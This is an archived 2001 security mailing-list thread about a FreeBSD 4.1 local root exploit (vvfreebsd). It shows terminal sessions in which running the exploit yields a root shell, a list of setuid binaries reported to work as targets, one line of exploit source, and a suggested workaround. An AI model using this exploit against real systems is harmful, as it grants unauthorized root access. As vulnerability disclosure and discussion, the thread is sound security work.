one@c0d4:/usr/home/c0d4$ uname
FreeBSD one.xxx.com.ar 4.1-RELEASE FreeBSD 4.1-RELEASE
one@c0d4:/usr/home/c0d4$ ./sig2
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe89
child=1371
login: # done
# id
uid=1000(c0d4) euid=0(root) gid=20(staff) groups=20(staff)
#
and with : /usr/bin/chfn ;/usr/bin/chsh
;/usr/bin/ypchpass; /usr/bin/ypchfn; /usr/bin/ypchsh ;/usr/bin/keyinit
; /usr/bin/login ;/usr/bin/passwd
;/usr/libexec/sendmail/sendmail; /usr/local/bin/kcheckpass;/usr/local/bin/icmpinfo
gave me suid shell too.
On Wed, 11 Jul 2001, Przemyslaw Frasunek wrote:
> > Well, after a bunch of tests I've found only two suids which gave me
> > suid shell:
> > /usr/bin/passwd
> > /usr/local/bin/ssh1
>
> /usr/bin/su also works for me:
>
> riget:venglin:~> egrep -e execl vvfreebsd.c
> if(!execl("/usr/bin/su","su","szymon",0))
>
> riget:venglin:~> ./v
> vvfreebsd. Written by Georgi Guninski
> shall jump to bfbffe72
> child=57660
> Password:done
> # id
> uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)
>
> > So, quick workaround should be
>
> Quick workaround is to limit arguments, environment and filter non-ascii
> characters:
>
> http://www.frasunek.com/sources/security/rexec/
>
> --
> * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
> * Inet: przemyslawat_private ** PGP: D48684904685DF43EA93AFA13BE170BF *
>
This archive was generated by hypermail 2b30 : Sun Jul 15 2001 - 20:55:57 PDT